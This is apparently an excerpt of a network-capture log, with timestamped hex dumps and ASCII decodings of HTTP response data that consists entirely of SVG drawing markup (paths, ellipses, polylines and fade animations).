                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4658INData Raw: 30 38 2d 33 2e 31 33 63 2d 31 2e 31 35 2d 34 2e 31 33 2d 35 2e 34 32 2d 34 2e 38 2d 39 2d 33 2e 36 34 2d 2e 39 2e 32 39 2d 33 2e 31 37 2c 31 2d 33 2e 34 35 2c 32 73 31 2e 31 32 2c 31 2e 36 2c 31 2e 33 33 2c 32 2e 34 37 63 2e 32 37 2c 31 2e 31 32 2d 2e 35 39 2c 32 2e 31 39 2e 33 34 2c 33 2e 32 36 61 33 2c 33 2c 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22
                                                                                                                                                                                                                                                        Data Ascii: 08-3.13c-1.15-4.13-5.42-4.8-9-3.64-.9.29-3.17,1-3.45,2s1.12,1.6,1.33,2.47c.27,1.12-.59,2.19.34,3.26a3,3,0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4674INData Raw: 31 2c 39 31 2e 39 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 35 35 22 20 64 3d 22 4d 38 32 37 2e 35 34 2c 38 36 2e 31 63 2d 2e 31 34 2d 31 2e 36 2d 2e 37 39 2d 33 2e 37 39 2d 32 2e 38 32 2d 32 2e 36 31 41 31 2e 34 2c 31 2e 34 2c 30 2c 30 2c 30 2c 38 32 34 2c 38 35 63 30 2c 32 2e 34 33 2e 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 1,91.9Z"/><path class="cls-155" d="M827.54,86.1c-.14-1.6-.79-3.79-2.82-2.61A1.4,1.4,0,0,0,824,85c0,2.43.67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4690INData Raw: 31 37 2e 39 32 63 2d 2e 31 38 2c 30 2d 34 39 2e 31 32 2c 31 34 2e 31 36 2d 35 38 2e 35 37 2c 31 38 2e 36 2d 37 2e 31 33 2c 33 2e 33 35 2d 31 38 2e 37 33 2c 35 2e 34 33 2d 32 36 2c 38 2e 33 35 2d 34 2e 34 35 2d 2e 39 32 2d 32 33 2e 37 31 2d 36 2e 36 35 2d 32 36 2e 34 37 2d 39 2e 34 35 2c 30 2c 30 2d 31 33 2e 35 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38
                                                                                                                                                                                                                                                        Data Ascii: 17.92c-.18,0-49.12,14.16-58.57,18.6-7.13,3.35-18.73,5.43-26,8.35-4.45-.92-23.71-6.65-26.47-9.45,0,0-13.5-3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4706INData Raw: 73 6c 61 74 65 28 34 37 2e 31 33 20 35 36 33 2e 32 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 32 35 22 20 63 79 3d 22 32 31 33 2e 37 31 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e
                                                                                                                                                                                                                                                        Data Ascii: slate(47.13 563.29) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.25" cy="213.71" rx="0.15" ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="tran
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4722INData Raw: 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 39 33 20 35 35 30 2e 33 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 34 38 22 20 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20
                                                                                                                                                                                                                                                        Data Ascii: "0.22" transform="translate(28.93 550.36) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.48" cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4738INData Raw: 34 2d 2e 35 32 2c 30 2d 31 2e 35 32 2e 31 33 2d 32 2e 30 36 2e 32 32 2d 2e 39 31 2e 37 33 2d 31 2e 37 33 2e 38 37 2d 32 2e 36 36 6c 2e 31 32 2e 30 36 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 34 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: 4-.52,0-1.52.13-2.06.22-.91.73-1.73.87-2.66l.12.06" style="display: block; animation: SVG-fade 4s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4754INData Raw: 20 32 30 30 2e 35 38 20 36 31 30 2e 36 34 20 32 30 36 2e 30 34 20 36 31 30 2e 38 35 20 32 31 32 2e 37 34 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 37 31 20 32 32 31 2e 31 37 20 35 39 30 2e 31 38 20 32 32 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37
                                                                                                                                                                                                                                                        Data Ascii: 200.58 610.64 206.04 610.85 212.74"></polyline><polyline class="cls-53" points="577.71 221.17 590.18 225.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4770INData Raw: 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 32 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ="display: block; animation: SVG-fade 2s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4786INData Raw: 30 2c 2e 34 39 73 30 2c 2e 33 35 2c 30 2c 2e 34 37 68 30 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 37 31 2d 2e 38 31 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2c 31 2d 2e 33 31 2c 31 2e 38 37 2c 31 2e 38 37 2c 30 2c 30 2c 31 2c 2e 34 35 2c 30 6c 30 2c 31 61 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a
                                                                                                                                                                                                                                                        Data Ascii: 0,.49s0,.35,0,.47h0a1.92,1.92,0,0,1,.71-.81,1.76,1.76,0,0,1,1-.31,1.87,1.87,0,0,1,.45,0l0,1a2.12,2.12,0,0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4802INData Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 33 34 2c 32 30 38 2e 36 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61
                                                                                                                                                                                                                                                        Data Ascii: path class="cls-4" d="M700.34,208.66a1.71,1.71,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4818INData Raw: 22 20 64 3d 22 4d 37 33 31 2e 38 31 2c 33 30 34 2e 37 37 41 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2c 37 33 31 2c 33 30 37 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                        Data Ascii: " d="M731.81,304.77A1.73,1.73,0,0,1,731,307a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4835INData Raw: 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 3,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4851INData Raw: 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 38 38 2c 32 39 36 2e 31 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38
                                                                                                                                                                                                                                                        Data Ascii: 1-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M780.88,296.17a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M78
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4867INData Raw: 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 37 33 2c 31 39 38 2e 33 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.15,2.86"></path><path class="cls-4" d="M798.73,198.39a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5171INData Raw: 64 3d 22 4d 38 33 30 2e 31 39 2c 32 39 34 2e 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 35 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                        Data Ascii: d="M830.19,294.5a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.95,2.38,2.38,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5187INData Raw: 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: .72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5203INData Raw: 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></p
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5219INData Raw: 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 37 2e 31 32 2c 31 38 38 2e 31 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 